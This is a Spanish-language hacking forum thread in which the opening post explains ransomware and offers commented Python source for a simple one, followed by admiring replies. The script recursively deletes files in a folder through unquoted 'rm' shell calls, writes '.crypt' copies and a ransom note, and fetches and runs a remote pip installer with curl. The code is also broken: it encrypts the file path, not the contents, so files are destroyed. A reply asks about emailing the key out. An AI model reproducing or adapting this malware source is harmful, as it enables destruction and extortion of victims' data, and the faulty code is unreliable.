Ransomware #1

  • 7 Respuestas
  • 1481 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado 000000 000000

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    6.67%
  • Country: uy
  • Reputación 3
  • Twitter: https://twitter.com/LinuxpowerYT
    • Ver Perfil
    • Linuxpower-web
    • Email

Ransomware #1

  • en: Febrero 08, 2020, 10:37:27 am
Hola buenas, antes de comenzar quería decirles que no pongan en los comentarios cosas como | COMO SUBES ESTE CONTENIDO o ESTAS LOCO AL SUBIR ESTO| ya que he sido autorizado para subirlo a demás esto no solo sirve para atacar también sirve para saber como funciona uno, sabiendo eso continuemos.

Bienvenidos, a la primera parte de esta serie, los ransomeware, en este artículo veremos que es, y haremos uno sencillo, comencemos!

DEFINICIÓN.


El ransomeware es un tipo de malware, que cifra información del usuario y generalmente pide dinero por ella como el gran conocido WannaCry, el mencionado anteriormente se distribuía generalmente por una vulnerabilidad y por eso creció tanto.

Para cifrar la información se suelen usar algoritmos como AES256 el cual es muy seguro y por lo tanto no podremos recuperar los archivos fácilmente, generalmente envía la clave a un servidor remoto en el ejemplo que voy a mostrar no se enviará, eso lo haré si veo que este post en bien recibido por ustedes  ;).



CREANDO UN RANSOMEWARE SIMPLE + VÍDEO DEMOSTRATIVO.


Después de saber que es un ransomeware pasemos a la parte práctica. El siguiente ransomeware será programado en python3, debido a que es sencillo y potente a demas de que es mi lenguaje favorito.

CÓDIGO COMENTADO.
Código: Python
  1.  
  2. import os, simplecrypt, random #Importamos las librerías simplecrypt no viene por default en python pero a continuacion veremos la solución.
  3. from getpass import getuser
  4.  
  5. user = getuser()
  6. rut = "/home/user/Desktop/Prueba/"
  7. ruta = rut.replace("user", user) #Conseguímos el nombre de usuario
  8. os.system("curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py ; python get-pip.py ; pip install simplecrypt ; rm get-pip.py") # Comandos que instalan la librería simplecrypt
  9.  
  10. longitud = 20
  11. char = "abcdefghijklmnopqrstuvwyz1234567890"
  12. password = ""
  13. while longitud != 0:
  14.    password += random.choice(char) # Generamos una clave aleatória de 20 caracteres con todas las letras y números.
  15.       longitud -= 1
  16.  
  17.  
  18. def cifrar(carpeta):
  19.    for archivo in os.listdir(carpeta):
  20.       elementos = os.path.join(carpeta,archivo)
  21.       if os.path.isdir(os.path.join(carpeta,archivo)):
  22.          cifrar(os.path.join(carpeta,archivo)) # Encontramos todos los ficheros de un directorio
  23.       try:
  24.          leer = open(elementos, "rb")
  25.          interior = leer.read()
  26.          os.system("rm " + elementos)
  27.          archivofinal = simplecrypt.encrypt(elementos, password)
  28.          directoriocifrado = elementos + ".crypt"
  29.          abrir = open(directoriocifrado, "wb")
  30.          abrir.write(archivofinal)
  31.          abrir.close() # Ciframos eliminamos y escribimos el resultado cifrado si puede ya que si se encuentra con una carpeta no la podrá cifrar
  32.          
  33.       except:
  34.          variable = 0
  35.          variable -= 1 # Hace algo inútil si encuentra algo que no puede cifrar
  36.  
  37.  
  38. def recuperar():
  39.    recuperar = open("Recuperararchivos.txt", "w")
  40.    recuperar.write("DAME MIS KIBABS y te los doy (^3^)")
  41.    recuperar.write("\n")
  42.    recuperar.write(password)
  43.    recuperar.close() # Escribe el mensaje de recuperación pero también escribe la contraseña.
  44.    
  45.  
  46. cifrar("/home/linuxpower/Desktop/Prueba")
  47. recuperar() # Llama a las funciones
  48.  

VÍDEO DEMOSTRATIVO.



&t

Saludos.  ;)
« Última modificación: Febrero 09, 2020, 05:42:22 pm por Bartz »

Conectado DtxdF

  • *
  • Moderador Global
  • Mensajes: 688
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email

Re:Ransomeware #1

  • en: Febrero 08, 2020, 12:32:06 pm
Muy buen post, te feiicito por lo que estás haciendo (Enseñar).

Generalmente los ransomwares usan «Números pseudo-aleatorios criptográficamente seguros», lo cifran con un algoritmo simétrico robusto (usando los números mencionados anteriormente) y almacenan las claves con un algoritmo de cifrado asimétrico en la misma base de datos restringiendo cada vez más atacarlos.

En conclusión, ¡SON UNOS DESGRACIADOS!

~ DtxdF
« Última modificación: Febrero 08, 2020, 12:54:20 pm por DtxdF »
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado 000000 000000

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    6.67%
  • Country: uy
  • Reputación 3
  • Twitter: https://twitter.com/LinuxpowerYT
    • Ver Perfil
    • Linuxpower-web
    • Email

Re:Ransomeware #1

  • en: Febrero 08, 2020, 04:48:01 pm
You are not allowed to view links. Register or Login
Muy buen post, te feiicito por lo que estás haciendo (Enseñar).

Generalmente los ransomwares usan «Números pseudo-aleatorios criptográficamente seguros», lo cifran con un algoritmo simétrico robusto (usando los números mencionados anteriormente) y almacenan las claves con un algoritmo de cifrado asimétrico en la misma base de datos restringiendo cada vez más atacarlos.

En conclusión, ¡SON UNOS DESGRACIADOS!

~ DtxdF

Gracias! Ese en concreto usa AES256 osea que ajajaaj

Desconectado EduardoDesdes

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Yahoo Instant Messenger - -
  • Skype: https://twitter.com/Eduardo_Desdes
    • Ver Perfil
    • GSINT
    • Email

Re:Ransomware #1

  • en: Febrero 12, 2020, 01:37:48 am
Hola, me parece genial el ransomware en python, justo yo tenia un proyecto parecido que estuve avanzando el año pasado el mi caso lo hice en bash, ahi lo pongo para quien quiera darle una revisada :D !

You are not allowed to view links. Register or Login

Saludos,

EduardoDesdes,

Desconectado polalem

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    3.33%
  • Reputación 0
    • Ver Perfil

Re:Ransomware #1

  • en: Abril 30, 2020, 03:32:07 pm
Excelente post tenia dudas como hacer un ransoware en python!

Desconectado KiddArabic

  • *
  • Underc0der
  • Mensajes: 299
  • Actividad:
    30%
  • Reputación 1
  • Vivir sin sueño no es vivir.
    • Ver Perfil

Re:Ransomware #1

  • en: Mayo 10, 2020, 10:57:16 pm
primero vi el video en youtube , no pense que estuvieras en undercode

Desconectado Sergulath

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    6.67%
  • Reputación 0
    • Ver Perfil

Re:Ransomware #1

  • en: Mayo 11, 2020, 12:39:43 am
Buenas,

Hablo desde el desconocimiento...
Una alternativa para enviar la llave no podría ser también enviarla por mail a algún correo?


Desconectado elshotta

  • *
  • Underc0der
  • Mensajes: 110
  • Actividad:
    16.67%
  • Reputación 0
    • Ver Perfil

Re:Ransomware #1

  • en: Mayo 13, 2020, 01:48:33 am
muy bueno bro siempre me pregunte como era el codigo fuente de un ransomware y su funcionamiento